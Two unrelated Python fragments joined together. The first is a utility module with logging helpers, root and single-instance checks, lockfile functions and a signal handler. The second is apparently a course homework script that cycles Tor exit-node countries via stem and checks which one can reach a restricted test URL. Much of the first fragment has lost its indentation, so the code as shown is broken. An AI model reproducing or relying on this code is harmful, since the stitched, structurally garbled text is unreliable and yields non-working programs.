print_color("VERBOSE: {}".format(arg), color="normal")
else:
def print_verbose(*args):
pass
if options.debug:
def print_debug(*args):
for arg in args:
print_color("DEBUG: {}".format(arg), color="cyan")
else:
def print_debug(*args):
pass
if options.no_warn:
def print_warn(*args):
pass
else:
def print_warn(*args):
for arg in args:
print_color("WARN: {}".format(arg), color="yellow")
if options.no_error:
def print_error(*args):
pass
else:
def print_error(*args):
for arg in args:
print_color("ERROR: {}".format(arg), color="red")
# Version Check
def RequireVersion(version):
if sys.version_info[0] < version:
print_error("Python {} or higher is required.".format(version))
sys.exit(1)
# Root Check
def require_root():
if (os.geteuid() != 0):
print_error("This script must be run as root")
sys.exit(-1)
def require_file(path, type="file", provider="none"):
"""
Checks if a required file is present.
Allows additional information such as filetype (file, deb, csv)
and provider (apt, github)
"""
if not os.path.isfile(path):
print_error("File Required: {}".format(path))
sys.exit(-1)
def require_single_instance(process_name):
"""
Checks if a process of the same name already exists and terminates if one does.
"""
# Restrict results to only python processes
    child = subprocess.Popen(
        """pgrep -lf python |
        grep {} |
        grep -v grep |
        grep -v {}""".format(process_name, os.getpid()),
        shell=True, stdout=subprocess.PIPE)
child.communicate()[0]
if (child.returncode == 0):
print_warn("Process already running. Terminating.")
sys.exit(-1)
def lock_file(path, message=None):
    if message is None:
        # Default to the current PID, resolved at call time; a default argument
        # of os.getpid() would be evaluated once at import time instead.
        message = os.getpid()
    lockfile = "{0}.lock".format(path)
    if not os.path.isfile(lockfile):
        try:
            with open(lockfile, "w") as f:
                f.write(str(message))
        except OSError as e:
            print_error(e)
    else:
        print_warn("Lockfile already exists")
def unlock_file(path):
lockfile = "{0}.lock".format(path)
    if os.path.isfile(lockfile):
try:
os.remove(lockfile)
except OSError as e:
print_error(e)
def test_lockfile(path):
    lockfile = "{0}.lock".format(path)
    return os.path.isfile(lockfile)
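# Example usage of the lockfile helpers (illustrative):
#     lock_file("/tmp/myjob")          # creates /tmp/myjob.lock holding the PID
#     if test_lockfile("/tmp/myjob"):
#         pass                         # exclusive work goes here
#     unlock_file("/tmp/myjob")        # removes the lock when done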
class GracefulKiller:
"""
Ref: https://stackoverflow.com/a/31464349/5339918/
Catches terminations and interrupts that can be tested for
at regular intervals and allow graceful process shutdown.
"""
kill_now = False
warn = False
def __init__(self, warn=False):
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
self.warn = warn
def exit_gracefully(self, signum, frame):
if self.warn:
print_warn("Termination signal caught. Stopping...")
self.kill_now = True
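# Example usage (illustrative): poll kill_now inside a worker loop so the
# process can finish its current unit of work before exiting.
#     killer = GracefulKiller(warn=True)
#     while not killer.kill_now:
#         do_work()   # hypothetical unit of work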
|
import io
import pycurl
from time import gmtime, strftime
import stem.process
from stem.util import term
# reference: https://stem.torproject.org/tutorials/to_russia_with_love.html
SOCKS_PORT = 7000
# generated by 1.3.2_find_exitnodes.py
countries_with_exit_node = ['us', 'de', 'ch', 'ru', 'no', 'at', 'se', 'nl', 'bg', 'fr', 'be', 'sg', 'ua', 'vn', 'lu', 'mx', 'lt', 'vg', 'jp', 'es', 'ca', 'sk', 'ee', 'hu', 'am', 'lv', 'gr', 'tw', 'fi', 'gb', 'kw', 'is', 'ro', 'cz', 'tr', 'hk', 'md', 'ar', 'pl', 'gt', 'in', 'sa', 'id', 'br', 'au', 'pa', 'nz', 'si', 'dk', 'za', 'pt', 'hr', 'it', 'kz', 'lr', 'ie', 'eg', 'kr']
url = "http://dogo.ece.cmu.edu/tor-homework/secret/"
def query(country):
output = io.BytesIO()
# connect to webserver with pycurl
query = pycurl.Curl()
query.setopt(pycurl.URL, url)
query.setopt(pycurl.PROXY, 'localhost')
query.setopt(pycurl.PROXYPORT, SOCKS_PORT)
query.setopt(pycurl.PROXYTYPE, pycurl.PROXYTYPE_SOCKS5_HOSTNAME)
query.setopt(pycurl.WRITEFUNCTION, output.write)
try:
query.perform()
# get http code, should be either 403 or 200
code = query.getinfo(pycurl.HTTP_CODE)
# get current time
t = strftime("%a, %d %b %Y %H:%M:%S", gmtime())
if (code == 200):
            # print the country name and time once we get a 200 response code
            print("Country:%s verified at %s" % (country, t))
return
# query failed with exception
except pycurl.error as exc:
return
# print bootstrap progress lines as tor starts up
def print_bootstrap_lines(line):
    if "Bootstrapped " in line:
        print(term.format(line, term.Color.BLUE))
# traverse all countries with exit node
for country in countries_with_exit_node:
try:
# Start tor instance with given exit node country
tor_process = stem.process.launch_tor_with_config(
config = {
'SocksPort': str(SOCKS_PORT),
'ExitNodes': ('{' + country + '}'),
},
init_msg_handler = print_bootstrap_lines,
)
# run query
query(country)
# Stop tor instance
tor_process.kill()
    except Exception:
        # tor failed to launch with this exit-node country; move on
        continue
|